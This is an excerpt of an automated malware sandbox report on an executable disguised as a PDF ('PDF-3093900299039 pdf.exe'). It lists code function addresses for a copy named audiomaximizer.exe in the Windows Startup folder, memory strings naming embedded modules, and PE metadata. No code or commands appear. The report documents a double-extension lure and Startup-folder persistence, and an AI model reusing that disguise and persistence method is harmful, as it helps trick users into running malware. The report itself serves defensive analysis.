Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5187	8_2_06ED5187
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED3997	8_2_06ED3997
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED696B	8_2_06ED696B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED6970	8_2_06ED6970
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8148	8_2_06ED8148
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED9940	8_2_06ED9940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8158	8_2_06ED8158
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED9930	8_2_06ED9930
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_073FD128	8_2_073FD128
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_073F3198	8_2_073F3198
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_073FD100	8_2_073FD100
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_073FA0F8	8_2_073FA0F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_073FA0E8	8_2_073FA0E8

Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000000.00000000.1680054852.0000000000553000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFisa.exe* vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4158359393.0000000005060000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4126959948.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename0 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000037E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4127824608.00000000014F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
Source: PDF-3093900299039 pdf.exe	Binary or memory string: OriginalFilenameFisa.exe* vs PDF-3093900299039 pdf.exe

Source: PDF-3093900299039 pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

